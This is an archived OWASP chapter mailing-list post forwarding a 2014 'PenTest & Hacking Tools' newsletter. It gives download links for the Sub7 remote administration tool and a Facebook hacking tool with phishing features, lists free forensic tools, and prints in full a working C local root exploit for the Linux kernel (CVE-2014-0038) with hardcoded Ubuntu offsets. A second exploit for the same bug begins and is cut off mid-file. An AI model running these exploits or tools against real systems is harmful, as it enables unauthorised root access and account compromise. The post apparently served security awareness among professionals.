[Owasp-cuiaba] Fwd: PenTest & Hacking Tools

Kembolle Amilkar contato em kembolle.com.br
Quinta Fevereiro 6 03:06:23 UTC 2014


Encaminhando...
--

- Kembolle Amilkar de Oliveira, Esp.
| T.A.D.S | G.P.N.T.I. |  G.T. I. | Seg. Info. |
Contact: Homepage <http://www.kembolle.com.br> |
Gtalk<contato em kembolle.com.br>|
MSN <contato em kembolle.com.br> | XMMP <contato em kembolle.com.br> |
SkypeID:Oliverkall


---------- Forwarded message ----------
From: KitPloit - The Hacker's Tools <noreply em blogger.com>
Date: 2014-02-05
Subject: PenTest & Hacking Tools
To: contato em kembolle.com.br


    PenTest & Hacking Tools <http://hack-tools.blackploit.com/>
------------------------------

   - [Sub7 v0.5] Remote Administration Tool <#14402b5f132eadab_1>
   - [FBHT v2.0] Facebook Hacking Tool <#14402b5f132eadab_2>
   - Collection Of Free Computer Forensic Tools <#14402b5f132eadab_3>
   - Exploit Linux 3.4+ Local Root (CONFIG_X86_X32=y) <#14402b5f132eadab_4>
   - Exploit Linux 3.4+ Arbitrary write with
CONFIG_X86_X32<#14402b5f132eadab_5>

  [Sub7 v0.5] Remote Administration
Tool<http://feedproxy.google.com/~r/PentestHackingTools/~3/AUTxuteJaVs/sub7-v05-remote-administration-tool.html?utm_source=feedburner&utm_medium=email>

Posted: 04 Feb 2014 08:22 PM PST
<http://2.bp.blogspot.com/-DtifaeQN04Y/UvG7O1FiDbI/AAAAAAAABzg/pipq5U-4GFQ/s1600/sub7.png>

This is the Newest Sub7 Remote Administration Tool..The Official Releases
can only be found @ www.sub-7.org

Submitted by *Diabl0*
*Password:*www.sub-7.org
*Download Sub7 v0.5 <https://www.dropbox.com/s/yfopzz1nl23aety/Sub7.rar>*

[FBHT v2.0] Facebook Hacking
Tool<http://feedproxy.google.com/~r/PentestHackingTools/~3/50WcTg3Z43k/fbht-v20-facebook-hacking-tool.html?utm_source=feedburner&utm_medium=email>

Posted: 04 Feb 2014 03:38 PM PST

<http://3.bp.blogspot.com/-sUT0BMtIOGw/UvFs5JVmS2I/AAAAAAAABwY/Nh6nxEMJLfE/s1600/Facebook+Hacking+Tool.jpg>


*FBHT* (*Facebook Hacking Tool*) is an open-source tool written in Python
that exploits multiple vulnerabilities on the Facebook platform


The tool provides:

   - Tests account handling (Create, Delete, Friend, Accept)
   - Youtube videos phishing
   - Facebook links preview modification
   - Friends list privacy bypass
   - Graph support
   - Facebook links preview modification
   - More...


*Download FBHT v2.0 <https://github.com/chinoogawa/fbht>*

Collection Of Free Computer Forensic
Tools<http://feedproxy.google.com/~r/PentestHackingTools/~3/kxOjTN79_IU/collection-of-free-computer-forensic.html?utm_source=feedburner&utm_medium=email>

Posted: 04 Feb 2014 01:49 PM PST
<http://1.bp.blogspot.com/-1iUwnGChfec/UvFd34HFsZI/AAAAAAAABvw/sqb8hidkOn4/s1600/Collection+Of+Free+Computer+Forensic+Tools.jpg>


Disk tools and data capture
NameFromDescriptionDumpIt<http://www.moonsols.com/2011/07/18/moonsols-dumpit-goes-mainstream/>
MoonSolsGenerates physical memory dump of Windows machines, 32 bits 64 bit.
Can run from a USB flash drive.EnCase Forensic
Imager<http://www1.guidancesoftware.com/Order-Forensic-Imager.aspx>Guidance
SoftwareCreate EnCase evidence files and EnCase logical evidence files
[direct download link]Encrypted Disk
Detector*<http://info.magnetforensics.com/encrypted-disk-detector>Magnet
ForensicsChecks local physical drives on a system for TrueCrypt, PGP, or
Bitlocker encrypted volumesEWF MetaEditor<http://www.4discovery.com/our-tools/>
4DiscoveryEdit EWF (E01) meta data, remove passwords (Encase v6 and
earlier)FAT32
Format <http://www.ridgecrop.demon.co.uk/index.htm?fat32format.htm>RidgecropEnables
large capacity disks to be formatted as FAT32Forensics Acquisition of
Websites <http://www.fawproject.com/en/default.aspx>Web Content Protection
AssociationBrowser designed to forensically capture web pagesFTK
Imager*<http://www.accessdata.com/support/product-downloads>
AccessDataImaging tool, disk viewer and image
mounterGuymager<http://guymager.sourceforge.net/>
vogu00Multi-threaded GUI imager under running under
LinuxHotSwap<http://mt-naka.com/hotswap/index_enu.htm>Kazuyuki
NakayamaSafely remove SATA disks similar to the "Safely Remove Hardware"
icon in the notification
areaLiveView<http://www.sei.cmu.edu/digitalintelligence/tools/liveview/index.cfm>
CERTAllows examiner to boot dd images in VMware.P2 Explorer
Free<http://www.paraben.com/p2-explorer.html>
ParabenMount forensic images as read-only local logical and physical disksLive
RAM Capturer* <http://forensic.belkasoft.com/en/ram-capturer>BelkasoftExtracts
RAM dump including that protected by an anti-debugging or anti-dumping
system. 32 and 64 bit
buildsOSFClone<http://www.osforensics.com/tools/create-disk-images.html>Passmark
SoftwareBoot utility for CD/DVD or USB flash drives to create dd or AFF
images/clones.OSFMount<http://www.osforensics.com/tools/mount-disk-images.html>Passmark
SoftwareMounts a wide range of disk images. Also allows creation of RAM
disksTableau Imager*<http://www.tableau.com/index.php?pageid=rev_history&product=tim&model=TSW-TIM>
TableauImaging tool for use with Tableau imaging productsVHD
Tool<http://archive.msdn.microsoft.com/vhdtool>
MicrosoftConverts raw disk images to VHD format which are mountable in
Windows Disk Management

<https://draft.blogger.com/blogger.g?blogID=8317222231133660547>
Email analysisNameFromDescriptionEDB
Viewer<http://www.nucleustechnologies.com/exchange-edb-viewer.html>Lepide
SoftwareOpen and view (not export) Outlook EDB files without an Exchange
serverMail Viewer <http://www.mitec.cz/mailview.html>MiTeCViewer for
Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird
message databases and single EML filesOST
Viewer<http://www.nucleustechnologies.com/ost-viewer.html>Lepide
SoftwareOpen and view (not export) Outlook OST files without connecting to
an Exchange serverPST
Viewer<http://www.nucleustechnologies.com/pst-viewer.html>Lepide
SoftwareOpen and view (not export) Outlook PST files without needing Outlook

<https://draft.blogger.com/blogger.g?blogID=8317222231133660547>
GeneralNameFromDescriptionAgent
Ransack<http://www.mythicsoft.com/page.aspx?type=agentransack&page=home>
MythicsoftSearch multiple files using Boolean operators and Perl RegexCaseNotes
Lite <http://www.blackthorn.com/casenotes-download/>BlackthornContemporaneous
notes recorderComputer Forensic Reference Data Sets<http://www.cfreds.nist.gov/>
NISTCollated forensic images for training, practice and validation
EvidenceMover* <http://www.nuix.com/Nuix-evidence-mover>NuixCopies data
between locations, with file comparison, verification,
loggingFastCopy<http://ipmsg.org/tools/fastcopy.html.en>Shirouzu
HiroakiSelf labelled 'fastest' copy/delete Windows software. Can verify
with SHA-1, etc.File
Signatures<http://www.garykessler.net/library/file_sigs.html>Gary
KesslerTable of file
signaturesHashMyFiles<http://www.nirsoft.net/utils/hash_my_files.html>
NirsoftCalculate MD5 and SHA1
hashesMobaLiveCD<http://mobalivecd-en.mobatek.net/>
MobatekRun Linux live CDs from their ISO image without having to boot to
themMouse Jiggler <http://mousejiggler.codeplex.com/>Arkane
SystemsAutomatically
moves mouse pointer stopping screen saver, hibernation etc.Notepad
++<http://notepad-plus-plus.org/>Notepad
++Advanced Notepad replacementNSRL <http://www.nsrl.nist.gov/Downloads.htm>
NISTHash sets of 'known' (ignorable) filesQuick
Hash<http://sourceforge.net/projects/quickhash/>Ted
TechnologyA Linux & Windows GUI for individual and recursive SHA1 hashing
of filesUSB Write
Blocker<http://dsicovery.com/dsicovery-software/usb-write-blocker/>
DSiEnables software write-blocking of USB portsUSB Write
Blocker<http://www.securitemulti-secteurs.ca/teacuteleacutechargements.html>Sécurité
Multi-SecteursSoftware write blocker for Windows XP through to Windows 8Windows
Forensic Environment <http://winfe.wordpress.com/>Troy LarsonGuide by Brett
Shavers to creating and working with a Windows boot CD

<https://draft.blogger.com/blogger.g?blogID=8317222231133660547>
File and data analysisNameFromDescriptionAdvanced Prefetch
Analyser<http://www.ash368.com/>Allan
HayReads Windows XP,Vista and Windows 7 prefetch
filesanalyzeMFT<https://github.com/dkovar/analyzeMFT>David
KovarParses the MFT from an NTFS file system allowing results to be
analysed with other toolsDefraser<http://sourceforge.net/projects/defraser/>
VariousDetects full and partial multimedia files in unallocated spaceeCryptfs
Parser <http://sourceforge.net/projects/ecryptfs-p/>Ted TechnologyRecursively
parses headers of every eCryptfs file in selected directory. Outputs
encryption algorithm used, original file size, signature used, etc.Encryption
Analyzer <http://www.lostpassword.com/encryption-analyzer.htm>PasswareScans
a computer for password-protected & encrypted files, reports encryption
complexity and decryption options for each
fileExifTool<http://www.sno.phy.queensu.ca/%7Ephil/exiftool/>Phil
HarveyRead, write and edit Exif data in a large number of file typesForensic
Image Viewer<http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software>Sanderson
ForensicsView various picture formats, image enhancer, extraction of
embedded Exif, GPS
dataHighlighter<http://www.mandiant.com/products/free_software/highlighter/>
MandiantExamine log files using text, graphic or histogram viewsLink
Parser<http://www.4discovery.com/our-tools/>
4DiscoveryRecursively parses folders extracting 30+ attributes from Windows
.lnk (shortcut)
filesLiveContactsView<http://www.nirsoft.net/utils/live_messenger_contacts.html>
NirsoftView and export Windows Live Messenger contact detailsRSA Netwitness
Investigator* <http://www.emc.com/security/rsa-netwitness.htm#%21freeware>
EMCNetwork packet capture and
analysisMemoryze<http://www.mandiant.com/products/free_software/memoryze/>
MandiantAcquire and/or analyse RAM images, including the page file on live
systemsMetaExtractor
<http://www.4discovery.com/our-tools/>4DiscoveryRecursively
parses folders to extract meta data from MS Office, OpenOffice and PDF files
MFTview<http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software>Sanderson
ForensicsDisplays and decodes contents of an extracted MFT
fileNetSleuth<http://www.netgrab.co.uk/>
NetGrabNetwork monitoring tool, with covert "silent port
scanning"PictureBox<http://www.mikesforensictools.co.uk/MFTPB.html>Mike's
Forensic ToolsLists EXIF, and where available, GPS data for all photographs
present in a directory. Export data to .xls or Google Earth KML format
PsTools <http://technet.microsoft.com/en-us/sysinternals/bb896649.aspx>
MicrosoftSuite of command-line Windows utilitiesShadow
Explorer<http://www.shadowexplorer.com/>Shadow
ExplorerBrowse and extract files from shadow copiesSimple File
Parser<http://simplefileparser.blogspot.co.uk/>Chris
MayhewGUI tool for parsing .lnk files, prefetch and jump list artefactsSQLite
Manager <https://addons.mozilla.org/en-US/firefox/addon/sqlite-manager/>Mrinal
Kant, Tarakant TripathyFirefox add-on enabling viewing of any SQLite
databaseStrings<http://technet.microsoft.com/en-gb/sysinternals/bb897439.aspx>
MicrosoftCommand-line tool for text searchesStructured Storage
Viewer<http://www.mitec.cz/ssv.html>
MiTecView and manage MS OLE Structured Storage based
filesSwitch-a-Roo<http://www.mikesforensictools.co.uk/MFTSAR.html>Mike's
Forensic ToolsText replacement/converter/decoder for when dealing with URL
encoding, etcWindows File Analyzer <http://www.mitec.cz/wfa.html>MiTeCAnalyse
thumbs.db, Prefetch, INFO2 and .lnk files

<https://draft.blogger.com/blogger.g?blogID=8317222231133660547>
Mac OS toolsNameFromDescriptionAudit
<https://github.com/twocanoes/audit>Twocanoes
SoftwareAudit Preference Pane and Log Reader for OS XDisk
Arbitrator<https://github.com/aburgh/Disk-Arbitrator>Aaron
BurghardtBlocks the mounting of file systems, complimenting a write blocker
in disabling disk arbitrationEpoch
Converter*<https://www.blackbagtech.com/resources/freetools/epochconverter.html>Blackbag
TechnologiesConverts epoch times to local time and UTCFTK Imager CLI for
Mac OS* <http://accessdata.com/support/adownloads>AccessDataCommand line
Mac OS version of AccessData's FTK
ImagerIORegInfo<https://www.blackbagtech.com/resources/freetools/ioreg-info.html>Blackbag
TechnologiesLists items connected to the computer (e.g., SATA, USB and
FireWire Drives, software RAID sets). Can locate partition information,
including sizes, types, and the bus to which the device is connectedMac
Memory Reader<http://cybermarshal.com/index.php/cyber-marshal-utilities/mac-memory-reader>Cyber
MarshalCommand-line utility to capture physical RAM from Mac OS systemsPMAP
Info* <https://www.blackbagtech.com/resources/freetools/pmap-info.html>Blackbag
TechnologiesDisplays the physical partitioning of the specified device. Can
be used to map out all the drive information, accounting for all used
sectors

<https://draft.blogger.com/blogger.g?blogID=8317222231133660547>
Mobile devicesNameFromDescriptioniPhone
Analyzer<http://sourceforge.net/projects/iphoneanalyzer/>Leo
Crawford, Mat ProudExplore the internal file structure of Pad, iPod and
iPhonesivMeta <http://www.csitech.co.uk/ivmeta-iphone-metadata/>Robin
WoodExtracts
phone model and software version and created date and GPS data from iPhone
videos.Rubus*<http://www.cclgroupltd.com/Buy-Software/rubus-ipd-de-constructor-utility.html>CCL
ForensicsDeconstructs Blackberry .ipd backup
filesSAFT<http://www.signalsec.com/saft/>SignalSEC
CorpObtain SMS Messages, call logs and contacts from Android devicesWhatsApp
Forensics <http://blog.digital-forensics.it/2012/05/whatsapp-forensics.html>Zena
ForensicsExtract WhatApp messages from iOS and Android backups

<https://draft.blogger.com/blogger.g?blogID=8317222231133660547>
Data analysis suitesNameFromDescriptionAutopsy<http://www.sleuthkit.org/autopsy/>Brian
CarrierGraphical interface to the command line digital investigation
analysis tools in The Sleuth Kit (see
below)Backtrack<http://www.backtrack-linux.org/>
BacktrackPenetration testing and security audit with forensic boot
capabilityCaine <http://www.caine-live.net/>Nanni BassettiLinux based live
CD, featuring a number of analysis toolsDeft <http://www.deftlinux.net/>Dr.
Stefano Fratepietro and othersLinux based live CD, featuring a number of
analysis toolsDigital Forensics Framework <http://www.digital-forensic.org/>
ArxSysAnalyses volumes, file systems, user and applications data,
extracting metadata, deleted and hidden itemsForensic
Scanner<https://github.com/appliedsec/forensicscanner>Harlan
CarveyAutomates 'repetitive tasks of data collection'. Fuller
description herePaladin* <http://www.sumuri.com/>SumuriUbuntu based live
boot CD for imaging and
analysisSIFT*<http://computer-forensics.sans.org/community/downloads/>
SANSVMware Appliance pre-configured with multiple tools allowing digital
forensic examinationsThe Sleuth Kit <http://www.sleuthkit.org/sleuthkit/>Brian
CarrierCollection of UNIX-based command line file and volume system
forensic analysis toolsUbuntu
guide<http://www.howtogeek.com/howto/15761/recover-data-like-a-forensics-expert-using-an-ubuntu-live-cd/>How-To
GeekGuide to using an Unbuntu live disk to recover partitions, carve files,
etc.Volatility Framework<https://www.volatilesystems.com/default/volatility>Volatile
SystemsCollection of tools for the extraction of artefacts from RAM

<https://draft.blogger.com/blogger.g?blogID=8317222231133660547>
File viewersNameFromDescriptionMicrosoft PowerPoint 2007
Viewer<http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=6>
MicrosoftView PowerPoint presentationsMicrosoft Visio 2010
Viewer<http://www.microsoft.com/download/en/details.aspx?id=21701>
MicrosoftView Visio diagramsVLC <http://www.videolan.org/>VideoLANView most
multimedia files and DVD, Audio CD, VCD, etc.

<https://draft.blogger.com/blogger.g?blogID=8317222231133660547>
Internet analysisNameFromDescriptionChrome Session
Parser<https://code.google.com/p/ccl-ssns/>CCL
ForensicsPython module for performing off-line parsing of Chrome session
files ("Current Session", "Last Session", "Current Tabs", "Last Tabs")
ChromeCacheView
<http://www.nirsoft.net/utils/chrome_cache_view.html>NirsoftReads
the cache folder of Google Chrome Web browser, and displays the list of all
files currently stored in the cacheCookie
Cutter<http://www.mikesforensictools.co.uk/MFTCookie.html>Mike's
Forensic ToolsExtracts embedded data held within Google Analytics cookies.
Shows search terms used as well as dates of and the number of visits.
Dumpzilla <http://www.dumpzilla.org/>BusindreRuns in Python 3.x, extracting
forensic information from Firefox, Iceweasel and Seamonkey browsers. See
manual for more information.Facebook Profile
Saver<http://forensic.belkasoft.com/en/facebook_profile_saver>
BelkasoftCaptures information publicly available in Facebook profiles.
IECookiesView <http://www.nirsoft.net/utils/iecookies.html>NirsoftExtracts
various details of Internet Explorer
cookiesIEPassView<http://www.nirsoft.net/utils/internet_explorer_password.html>
NirsoftExtract stored passwords from Internet Explorer versions 4 to 8
MozillaCacheView <http://www.nirsoft.net/utils/mozilla_cache_viewer.html>
NirsoftReads the cache folder of Firefox/Mozilla/Netscape Web browsers
MozillaCookieView <http://www.nirsoft.net/utils/mzcv.html>NirsoftParses the
cookie folder of Firefox/Mozilla/Netscape Web
browsersMozillaHistoryView<http://www.nirsoft.net/utils/mozilla_history_view.html>
NirsoftReads the history.dat of Firefox/Mozilla/Netscape Web browsers, and
displays the list of all visited Web
pageMyLastSearch<http://www.nirsoft.net/utils/my_last_search.html>
NirsoftExtracts search queries made with popular search engines (Google,
Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace)
PasswordFox <http://www.nirsoft.net/utils/passwordfox.html>NirsoftExtracts
the user names and passwords stored by Mozilla Firefox Web browser
OperaCacheView <http://www.nirsoft.net/utils/opera_cache_view.html>NirsoftReads
the cache folder of Opera Web browser, and displays the list of all files
currently stored in the
cacheOperaPassView<http://www.nirsoft.net/utils/opera_password_recovery.html>
NirsoftDecrypts the content of the Opera Web browser password file, wand.datWeb
Historian <http://www.mandiant.com/resources/download/web-historian>MandiantReviews
list of URLs stored in the history files of the most commonly used browsersWeb
Page Saver* <http://info.magnetforensics.com/web-page-saver>Magnet
ForensicsTakes
list of URLs saving scrolling captures of each page. Produces HTML report
file containing the saved pages

<https://draft.blogger.com/blogger.g?blogID=8317222231133660547>
Registry analysisNameFromDescriptionForensicUserInfo<http://www.woanware.co.uk/forensics/forensicuserinfo.html>
WoanwareExtracts user information from the SAM, SOFTWARE and SYSTEM hives
files and decrypts the LM/NT hashes from the SAM fileProcess
Monitor<http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx>
MicrosoftExamine Windows processes and registry threads in real timeRegistry
Decoder <http://www.digitalforensicssolutions.com/registrydecoder/>US
National Institute of Justice, Digital Forensics SolutionsFor the
acquisition, analysis, and reporting of registry
contentsRegRipper<http://regripper.wordpress.com/>Harlan
CarveyRegistry data extraction and correlation
toolRegshot<http://sourceforge.net/projects/regshot/files/>
RegshotTakes snapshots of the registry allowing comparisons e.g., show
registry changes after installing
softwaresbag<https://www.tzworks.net/prototype_page.php?proto_id=14>
TZWorksExtracts data from Shellbag entriesUSB Device
Forensics<http://www.woanware.co.uk/forensics/usbdeviceforensics.html>
WoanwareDetails previously attached USB devices on exported registry hivesUSB
Historian <http://www.4discovery.com/our-tools/>4DiscoveryDisplays 20+
attributes relating to USB device use on Windows
systemsUSBDeview<http://www.nirsoft.net/utils/usb_devices_view.html>
NirsoftDetails previously attached USB devicesUser Assist
Analysis<http://www.4discovery.com/our-tools/>
4DiscoveryExtracts SID, User Names, Indexes, Application Names, Run Counts,
Session, and Last Run Time Attributes from UserAssist
keysUserAssist<http://blog.didierstevens.com/programs/userassist/>Didier
StevensDisplays list of programs run, with run count and last run date and
timeWindows Registry Recovery <http://www.mitec.cz/wrr.html>MiTecExtracts
configuration settings and other information from the Registry

<https://draft.blogger.com/blogger.g?blogID=8317222231133660547>
Application analysisNameFromDescriptionDropbox
Decryptor*<http://info.magnetforensics.com/dropbox-decryptor>Magnet
ForensicsDecrypts the Dropbox filecache.dbx file which stores information
about files that have been synced to the cloud using DropboxGoogle Maps
Tile Investigator*<http://info.magnetforensics.com/google-maps-tile-investigator>Magnet
ForensicsTakes x,y,z coordinates found in a tile filename and downloads
surrounding tiles providing more
contextKaZAlyser<http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software>Sanderson
ForensicsExtracts various data from the KaZaA
applicationLiveContactsView<http://www.nirsoft.net/utils/live_messenger_contacts.html>
NirsoftView and export Windows Live Messenger contact
detailsSkypeLogView<http://www.nirsoft.net/utils/skype_log_view.html>
NirsoftView Skype calls and chats

<https://draft.blogger.com/blogger.g?blogID=8317222231133660547>
AbandonwareNameFromDescriptionDCode<http://www.digital-detective.co.uk/downloads.asp>Digital
DetectiveConverts various data types to date/time valuesiPhone Backup
Browser <http://code.google.com/p/iphonebackupbrowser/>Rene DevichiView
unencrypted backups of iPad, iPod and
iPhonesChromeAnalysis<http://forensic-software.co.uk/Downloads/Default.aspx>Foxton
SoftwareAnalysis of internet history data generated using Google Chrome
IEHistoryView <http://www.nirsoft.net/utils/iehv.html>NirsoftExtracts
recently visited Internet Explorer URLs



*Source <http://forensiccontrol.com/resources/free-software/>*

Exploit Linux 3.4+ Local Root
(CONFIG_X86_X32=y)<http://feedproxy.google.com/~r/PentestHackingTools/~3/cBw4OroSyoY/exploit-linux-34-local-root.html?utm_source=feedburner&utm_medium=email>

Posted: 04 Feb 2014 11:10 AM PST
<http://2.bp.blogspot.com/-Y6D1jyQqSDI/UvE6lsn3f8I/AAAAAAAABvg/V9ET5Al5vxc/s1600/linux_exploit.jpg>

OSVDB-ID: 2014-0038 <http://osvdb.org/show/osvdb/2014-0038>
Author: rebel
Published: 2014-02-02

/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
CVE-2014-0038 / x32 ABI with recvmmsg
by rebel @ irc.smashthestack.org
-----------------------------------

takes about 13 minutes to run because timeout->tv_sec is decremented
once per second and 0xff*3 is 765.

some things you could do while waiting:
  * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
  * read https://wiki.ubuntu.com/Security/Features and smirk a few times
  * brew some coffee
  * stare at the countdown giggly with anticipation

could probably whack the high bits of some pointer with nanoseconds,
but that would require a bunch of nulls before the pointer and then
reading an oops from dmesg which isn't that elegant.

&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes

hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
anyway..

same principle will work on 32bit but I didn't really find any major
distros shipping with CONFIG_X86_X32=y

user em ubuntu:~$ uname -a
Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC
2013 x86_64 x86_64 x86_64 GNU/Linux
user em ubuntu:~$ gcc recvmmsg.c -o recvmmsg
user em ubuntu:~$ ./recvmmsg
byte 3 / 3.. ~0 secs left.
w00p w00p!
# id
uid=0(root) gid=0(root) groups=0(root)
# sh phalanx-2.6b-x86_64.sh
unpacking..

:)=

greets to my homeboys kaliman, beist, capsl & all of #social

Sat Feb  1 22:15:19 CET 2014
% rebel %
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200

int port;

struct offset {
    char *kernel_version;
    unsigned long dest; // net_sysctl_root + 96
    unsigned long original_value; // net_ctl_permissions
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
};

struct offset offsets[] = {
    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0},
// Ubuntu 13.10
    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40},
// Ubuntu 13.10
    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0,
0xffffffff81084500}, // Ubuntu 13.04
    {NULL,0,0,0,0}
};

void udp(int b) {
    int sockfd;
    struct sockaddr_in servaddr,cliaddr;
    int s = 0xff+1;

    if(fork() == 0) {
        while(s > 0) {
            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left
\b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
            sleep(1);
            s--;
            fprintf(stderr,".");
        }

        sockfd = socket(AF_INET,SOCK_DGRAM,0);
        bzero(&servaddr,sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
        servaddr.sin_port=htons(port);
        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
        exit(0);
    }

}

void trigger() {
    open("/proc/sys/net/core/somaxconn",O_RDONLY);

    if(getuid() != 0) {
        fprintf(stderr,"not root, ya blew it!\n");
        exit(-1);
    }

    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*
_prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

void __attribute__((regparm(3)))
trampoline()
{
    asm("mov $getroot, %rax; call *%rax;");
}

int main(void)
{
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char buf[BUFSIZE];
    long mmapped;
    struct utsname u;
    struct offset *off = NULL;

    uname(&u);

    for(i=0;offsets[i].kernel_version != NULL;i++) {
        if(!strcmp(offsets[i].kernel_version,u.release)) {
            off = &offsets[i];
            break;
        }
    }

    if(!off) {
        fprintf(stderr,"no offsets for this kernel version..\n");
        exit(-1);
    }

    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
    mmapped &= 0x000000ffffffffff;

        srand(time(NULL));
    port = (rand() % 30000)+1500;

    commit_creds = (_commit_creds)off->commit_creds;
    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;

    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3,
PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,
0, 0);

    if(mmapped == -1) {
        perror("mmap()");
        exit(-1);
    }

    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);

    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);

    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3,
PROT_READ|PROT_EXEC) != 0) {
        perror("mprotect()");
        exit(-1);
    }

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(-1);
    }

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);

    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(-1);
    }

    memset(msgs, 0, sizeof(msgs));

    iovecs[0].iov_base = &buf;
    iovecs[0].iov_len = BUFSIZE;
    msgs[0].msg_hdr.msg_iov = &iovecs[0];
    msgs[0].msg_hdr.msg_iovlen = 1;

    for(i=0;i < 3 ;i++) {
        udp(i);
        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void
*)off->dest+7-i);
        if(!retval) {
            fprintf(stderr,"\nrecvmmsg() failed\n");
        }
    }

    close(sockfd);

    fprintf(stderr,"\n");

    trigger();
}


*Download Exploit Linux 3.4+ local root
<http://www.exploit-db.com/download/31347>*

Exploit Linux 3.4+ Arbitrary write with
CONFIG_X86_X32<http://feedproxy.google.com/~r/PentestHackingTools/~3/7jI-PRPYflQ/exploit-linux-34-arbitrary-write-with.html?utm_source=feedburner&utm_medium=email>

Posted: 04 Feb 2014 11:07 AM PST
<http://1.bp.blogspot.com/-uHgAxPAWJ5o/UvE5ir-tCzI/AAAAAAAABvU/t5v10tcpkc8/s1600/linux_exploit.jpg>

CVE: 2014-0038 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0038>
Author: saelo
Published: 2014-02-02

/*
 * Local root exploit for CVE-2014-0038.
 *
 * https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c
 *
 * Bug: The X86_X32 recvmmsg syscall does not properly sanitize the
timeout pointer
 * passed from userspace.
 *
 * Exploit primitive: Pass a pointer to a kernel address as timeout
for recvmmsg,
 * if the original byte at that address is known it can be overwritten
 * with known data.
 * If the least significant byte is 0xff, waiting 255 seconds will
turn it into a 0x00.
 *
 * Restrictions: The first long at the passed address (tv_sec) has to
be positive
 * and the second long (tv_nsec) has to be smaller than 1000000000.
 *
 * Overview: Target the release function pointer of the ptmx_fops
structure located in
 * non initialized (and thus writable) kernel memory. Zero out the three most
 * significant bytes and thus turn it into a pointer to an address mappable in
 * user space.
 * The release pointer is used as it is followed by 16 0x00 bytes (so
the tv_nsec
 * is valid).
 * Open /dev/ptmx, close it and enjoy.
 *
 * Not very beautiful but should be fairly reliable if symbols can be resolved.
 *
 * Tested on Ubuntu 13.10
 *
 * gcc timeoutpwn.c -o pwn && ./pwn
 *
 * Written by saelo
 */
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/mman.h>

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)

#define BUFSIZE 200
#define PAYLOADSIZE 0x2000
#define FOPS_RELEASE_OFFSET 13*8

/*
 * Adapt these addresses for your need.
 * see /boot/System.map* or /proc/kallsyms
 * These are the offsets from ubuntu 3.11.0-12-generic.
 */
#define PTMX_FOPS           0xffffffff81fb30c0LL
#define TTY_RELEASE         0xffffffff8142fec0LL
#define COMMIT_CREDS        0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*
_prepare_kernel_cred)(unsigned long cred);

/*
